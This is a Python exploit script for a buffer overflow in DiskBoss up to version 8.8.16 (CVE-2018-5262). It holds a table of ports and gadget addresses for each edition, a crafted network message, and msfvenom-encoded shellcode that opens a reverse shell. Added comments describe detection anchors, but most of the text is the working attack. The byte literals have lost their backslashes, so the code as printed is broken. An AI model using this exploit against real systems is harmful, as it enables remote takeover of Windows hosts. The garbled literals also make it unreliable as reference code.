# Exploit Title: DiskBoss <= 8.8.16 - Unauthenticated Remote Code Execution
# Date: 2017-08-27
# Exploit Author: Arris Huijgen
# Vendor Homepage: http://www.diskboss.com/
# Software Link: http://www.diskboss.com/setups/diskbossent_setup_v8.8.16.exe
# Version: Through 8.8.16
# Tested on: Windows 7 SP1 x64, Windows XP SP3 x86
# CVE: CVE-2018-5262

# Usage
# 1. Update the Target section
# 2. Update the shellcode
# 3. Launch!


import socket
from struct import pack

# Software editions: each entry is (listening TCP port, address of an
# "ADD ESP,8 | RET 0x04" gadget in the DLL named in the trailing comment).
# The ports 8094 and 8096-8098 are the service endpoints these entries
# talk to; from a defensive standpoint they should not be reachable from
# untrusted networks on the versions the header lists as affected.

# *8416 entries
free8416 = 8096, 0x10036e9a  # libdbs.dll
pro8416 = 8097, 0x10036e9a  # libdbs.dll
ult8416 = 8098, 0x10036e9a  # libdbs.dll
srv8416 = 8094, 0x1001806e  # libpal.dll
ent8416 = 8094, 0x1001806e  # libpal.dll

# *8512 entry
ent8512 = 8094, 0x100180ee  # libpal.dll

# *8816 entries
free8816 = 8096, 0x10037f6a  # libdbs.dll
pro8816 = 8097, 0x10037f6a  # libdbs.dll
ult8816 = 8098, 0x10037f6a  # libdbs.dll
srv8816 = 8094, 0x100180f9  # libpal.dll
ent8816 = 8094, 0x100180f9  # libpal.dll


# Target: the selected edition tuple supplies both the port and the gadget
# address that main() reads.
host = '127.0.0.1'
port, addr = ent8816


def main():
    """Build the single crafted request and send it to the configured target.

    Reads the module-level ``host``, ``port`` and ``addr`` (Target section)
    and writes nothing back; the only side effects are one TCP connection,
    one ``send`` and two status lines on stdout. No response is read and
    nothing is verified after sending.

    Defensive notes grounded in this script: the request goes to one of the
    service ports listed in the edition table, and its first 16 bytes are
    constant here, so that prefix is the natural anchor for a network
    detection rule; the header lists versions through 8.8.16 as affected.
    """
    # Connect: plain TCP, no authentication step before the request.
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))
    print '[+] Connected to %s:%d' % (host, port)

    # Memory: total request body size and the position within it that the
    # author's layout targets; both are fixed constants in this script.
    size = 1000
    offset = 128

    # Payload fragments. The trailing comments are the original author's
    # description of each fragment; the literals are reproduced as-is.
    preret = 'xEBx06x90x90' # JMP 0x06
    ret = pack('<I', addr) # Depending on the software edition (see edition table)
    pivot = 'xe9x3fxfbxffxff' # JMP -0x4BC

    # msfvenom -a x86 --platform windows -p windows/shell_reverse_tcp LHOST=127.0.0.1 LPORT=1234 EXITFUNC=thread -f c -e x86/shikata_ga_nai -b 'x00'
    # Payload size: 351 bytes
    # NOTE(review): per the generator line above this is an encoded reverse
    # shell to 127.0.0.1:1234; any real use would have to regenerate it, so
    # treat the bytes below as an opaque blob when reading the layout.
    sc = (
        "xb8x80xacx48x8fxd9xc4xd9x74x24xf4x5dx2bxc9xb1"
        "x52x31x45x12x03x45x12x83x45xa8xaax7axb9x59xa8"
        "x85x41x9axcdx0cxa4xabxcdx6bxadx9cxfdxf8xe3x10"
        "x75xacx17xa2xfbx79x18x03xb1x5fx17x94xeax9cx36"
        "x16xf1xf0x98x27x3ax05xd9x60x27xe4x8bx39x23x5b"
        "x3bx4dx79x60xb0x1dx6fxe0x25xd5x8exc1xf8x6dxc9"
        "xc1xfbxa2x61x48xe3xa7x4cx02x98x1cx3ax95x48x6d"
        "xc3x3axb5x41x36x42xf2x66xa9x31x0ax95x54x42xc9"
        "xe7x82xc7xc9x40x40x7fx35x70x85xe6xbex7ex62x6c"
        "x98x62x75xa1x93x9fxfex44x73x16x44x63x57x72x1e"
        "x0axcexdexf1x33x10x81xaex91x5bx2cxbaxabx06x39"
        "x0fx86xb8xb9x07x91xcbx8bx88x09x43xa0x41x94x94"
        "xc7x7bx60x0ax36x84x91x03xfdxd0xc1x3bxd4x58x8a"
        "xbbxd9x8cx1dxebx75x7fxdex5bx36x2fxb6xb1xb9x10"
        "xa6xbax13x39x4dx41xf4x39x92x49x05xaex90x49x01"
        "xfcx1cxafx63x10x49x78x1cx89xd0xf2xbdx56xcfx7f"
        "xfdxddxfcx80xb0x15x88x92x25xd6xc7xc8xe0xe9xfd"
        "x64x6ex7bx9ax74xf9x60x35x23xaex57x4cxa1x42xc1"
        "xe6xd7x9ex97xc1x53x45x64xcfx5ax08xd0xebx4cxd4"
        "xd9xb7x38x88x8fx61x96x6ex66xc0x40x39xd5x8ax04"
        "xbcx15x0dx52xc1x73xfbxbax70x2axbaxc5xbdxbax4a"
        "xbexa3x5axb4x15x60x7ax57xbfx9dx13xcex2ax1cx7e"
        "xf1x81x63x87x72x23x1cx7cx6ax46x19x38x2cxbbx53"
        "x51xd9xbbxc0x52xc8"
    )

    # Compile payload: filler up to `offset`, the three fragments above, then
    # padding so that code + nops + sc + the 100-byte tail totals `size`.
    # The long runs of 'A', the padding byte and the trailing 'C' * 100 are
    # the parts of this request a content rule can key on independently of
    # the shellcode.
    fill = 'A' * (offset - len(preret))
    code = fill + preret + ret + pivot
    nops = 'x90' * (size - len(code) - len(sc) - 100)
    payload = code + nops + sc + 'C' * 100

    # Compile message: a constant 4-byte prefix, two constant 4-byte words,
    # the payload length repeated twice, the payload's last byte as a
    # little-endian 32-bit value, then the payload itself.
    msg = (
        'x75x19xbaxab' +
        'x03x00x00x00' +
        'x00x40x00x00' +
        pack('<I', len(payload)) +
        pack('<I', len(payload)) +
        pack('<I', ord(payload[-1])) +
        payload
    )

    # Send message: a single send() call with no response handling; the
    # socket is never closed explicitly and is released when the process exits.
    s.send(msg)
    print '[+] Exploit sent!'


# Script entry point: only runs main() when executed directly, never on import.
if __name__ == "__main__":
    main()